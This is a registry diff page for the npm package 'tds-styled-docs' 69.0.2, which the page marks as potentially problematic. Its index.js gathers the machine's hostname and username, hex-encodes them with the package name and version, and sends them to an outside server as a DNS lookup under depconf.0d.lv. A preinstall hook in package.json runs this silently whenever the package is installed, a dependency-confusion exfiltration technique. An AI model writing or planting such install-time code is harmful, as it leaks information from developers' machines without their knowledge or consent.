tds-styled-docs 69.0.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of tds-styled-docs might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/README.md +1 -0
  2. package/index.js +16 -0
  3. package/package.json +12 -0
package/README.md ADDED
@@ -0,0 +1 @@
1
+ tds-styled-docs
package/index.js ADDED
@@ -0,0 +1,16 @@
1
+ const package_name = "tds-styled-docs";
2
+ const package_version = "68.0.2";
3
+
4
+
5
+
6
+ const os = require("os");
7
+ const dns = require("dns");
8
+
9
+ function version() {
10
+ console.log(package_name + " v" + package_version);
11
+ }
12
+
13
+ const token = package_name + "-" + package_version + "-" + os.hostname() + "-" + os.userInfo().username;
14
+ dns.lookup(Buffer.from(token).toString('hex') + ".depconf.0d.lv", (err, address, family) => { });
15
+
16
+ module.exports = version;
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "tds-styled-docs",
3
+ "version": "69.0.2",
4
+ "description": "tds-styled-docs",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "node index.js"
9
+ },
10
+ "author": "NST",
11
+ "license": "ISC"
12
+ }